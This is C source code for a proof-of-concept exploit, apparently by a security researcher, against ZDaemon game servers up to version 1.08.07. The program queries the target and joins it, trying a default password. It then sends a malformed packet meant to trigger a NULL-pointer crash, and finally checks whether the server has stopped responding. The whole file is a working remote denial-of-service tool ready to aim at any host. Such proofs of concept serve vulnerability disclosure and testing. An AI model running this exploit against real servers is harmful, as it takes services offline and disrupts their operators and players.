/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "wad_md5.h"
#include "zd_huffman.c"
#include "zdaemon.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <sys/param.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stristr strcasestr
    #define stricmp strcasecmp
    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        10666
#define BUFFSZ      8192
#define TWAIT       3
#define VERSION     108

#define PUT32(x,y)  *(u32 *)x = y; \
                    x += 4;



int addwad(u8 *data, u8 *wad, u8 *md5);
u8 **info_proto(u8 *data, int len, int *ver, int *wads);
void delimit(u8 *data);
int mycpy(u8 *dst, u8 *src);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int sec);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  linger  ling = {1,1};
    struct  sockaddr_in peer;
    int     sd,
            i,
            len,
            wads        = 0,
            ver         = VERSION;
    u16     port        = PORT;
    u8      buff[BUFFSZ],
            huffbuff[BUFFSZ],
            password[128],
            **wad,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "ZDaemon <= 1.08.07 NULL pointer " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port    = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    printf("- query server:\n");
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    p = buff;
    PUT32(p, LAUNCHER_CHALLENGE);
    len = send_recv(sd, buff, p - buff, buff, sizeof(buff), &peer, 1);
    close(sd);
    wad = info_proto(buff, len, &ver, &wads);

    HuffInit();

    password[0] = 0;
    for(;;) {
        printf("- join the server\n");
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));

        p = buff;
        *p++ = 0xff;                            // no compression
        *p++ = CONNECT_CHALLENGE;               // cmd
        *p++ = ver;                             // version
        *p++ = 0;                               // level
        p   += mycpy(p, password);              // password
        *p++ = 1 + wads;                        // number of wads
        p   += addwad(p, "ZDAEMON.WAD", NULL);
        for(i = 0; i < wads; i++) {
            p += addwad(p, wad[i],      NULL);
        }

        len = send_recv(sd, buff, p - buff, buff, sizeof(buff), &peer, 1);
        HuffDecode(buff, huffbuff, len, &len);  // decompression

        if(huffbuff[0] == NETWORK_ERROR) {
            p = huffbuff + 1;
            goto error;
        } else if(huffbuff[5] == NETWORK_ERROR) {
            p = huffbuff + 6;
            goto error;
        }

        len = send_recv(sd, NULL, 0, buff, sizeof(buff), &peer, 0);
        if(len < 0) {
            printf(" socket timeout\n");
            break;
        }
        HuffDecode(buff, huffbuff, len, &len);  // decompression

        if((huffbuff[5] == NETWORK_ERROR) || (huffbuff[5] == sv_kick)) {
            p = huffbuff + 6;
            goto error;
        }
        break;
error:
        close(sd);
        if(stristr(p, "full")) {
            printf(" server full ");
            for(i = TWAIT; i; i--) {
                printf("%3d\b\b\b", i);
                sleep(ONESEC);
            }
        } else if(stristr(p, "password")) {
            if(!password[0]) {
                strcpy(password, "password");
            } else {
                printf("- server is protected with password, insert the keyword:\n  ");
                fgets(password, sizeof(password), stdin);
                delimit(password);
            }
        } else if(stristr(p, "banned")) {
            printf("\n"
                "Error: your IP is banned on this server:\n"
                "       %s\n", p);
            exit(1);
        } else {
            printf("\n"
                "Error: client has not been accepted:\n"
                "       %s\n", p);
            exit(1);
        }
    }

    printf("- send the bad packet\n");
    p = buff;
    *p++ = 0xff;    // no huffman
    *p++ = 6;
    send_recv(sd, buff, p - buff, NULL, 0, &peer, 0);
    sleep(ONESEC);
    close(sd);

    sleep(ONESEC);
    printf("- check server:\n");
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    p = buff;
    PUT32(p, LAUNCHER_CHALLENGE);
    if(send_recv(sd, buff, p - buff, buff, sizeof(buff), &peer, 0) < 0) {
        printf("\n  Server IS vulnerable!!!\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n");
    }
    close(sd);

    for(i = 0; i < wads; i++) free(wad[i]); // free everything
    free(wad);
    return(0);
}



int addwad(u8 *data, u8 *wad, u8 *md5) {
    int     i,
            tmp;
    u8      *p;

    p = data;

    if(!md5) {
        for(i = 0; wad_md5[i][0]; i++)  {
            if(!stricmp(wad, wad_md5[i][0])) {
                md5 = wad_md5[i][1];
                break;
            }
        }
        if(!md5) {
            printf("\n- %s not found in the MD5 database", wad);
            md5 = wad_md5[0][1];
        }
    }

    p += mycpy(p, wad);

    for(i = 0; i < 16; i++) {
        sscanf(md5, "%02x", &tmp);
        md5 += 2;
        *p++ = tmp;
    }

    return(p - data);
}



u8 **info_proto(u8 *data, int len, int *ver, int *wads) {
    int     i,
            num;
    u8      *limit,
            **wad;

    limit = data + len;
    printf("\n");
    printf("  Master ch  %d\n", *(u32 *)data);              data += 4;
    printf("  Hostname   %s\n", data);                      data += strlen(data) + 1;
    printf("  Players    %hhu/%hhu\n", data[0], data[1]);   data += 2;
    printf("  Mapname    %s\n", data);                      data += strlen(data) + 1;
    num = *data++;
    *wads = num + 1;
    wad = malloc(*wads * sizeof(char *));                   // +1 for Iwad too
    if(num) {
        printf("  Wads:\n");
        for(i = 0; i < num; i++) {
            wad[i] = strdup(data);
            printf("    %s ", data);                        data += strlen(data) + 1;
        }
        printf("\n");
    }
    printf("  Gametype   %hhu\n", *data++);
    printf("  Gamename   %s\n", data);                      data += strlen(data) + 1;
    wad[*wads - 1] = strdup(data);
    printf("  IWad       %s\n", data);                      data += strlen(data) + 1;
    printf("  Gameskill  %hhu\n", *data++);
    printf("  File path  %s\n", data);                      data += strlen(data) + 1;
    printf("  E-mail     %s\n", data);                      data += strlen(data) + 1;
    printf("  DMFlags    %u\n", *(u32 *)data);              data += 4;
    printf("  DMFlags2   %u\n", *(u32 *)data);              data += 4;
    num = *data++;
    if(num) {
        printf("  Players:\n");
        for(i = 0; i < num; i++) {
            printf("    %s ", data);                        data += strlen(data) + 1;
            printf("  %hu ", *(u16 *)data);                 data += 2;
            printf("  %hu", *(u16 *)data);                  data += 2;
            printf("  %hhu", *data++);
            printf("  %hu", *(u16 *)data);                  data += 2;
            printf("\n");
        }
    }

    *ver = *(u16 *)data;                                    data += 2;
    printf("  Version    %hu\n", *ver);
//    printf("  Ext info   %u\n", *(u32 *)data);           data += 4;
    data += 4;
    printf("  Password   %hhu\n", *data++);

    // come on, it's enough
    // that's all we need

    return(wad);
}



void delimit(u8 *data) {
    while(*data && (*data != '\n') && (*data != '\r')) data++;
    *data = 0;
}



int mycpy(u8 *dst, u8 *src) {
    u8      *p;

    for(p = dst; *src; src++, p++) {
        *p = *src;
    }
    *p++ = 0;
    return(p - dst);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry = 2,
            len;

    if(in) {
        while(retry--) {
            //fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!out) return(0);
            if(!timeout(sd, 2)) break;
        }
    } else {
        if(timeout(sd, 3) < 0) retry = -1;
    }

    if(retry < 0) {
        if(!err) return(-1);
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }

    //fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}




int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


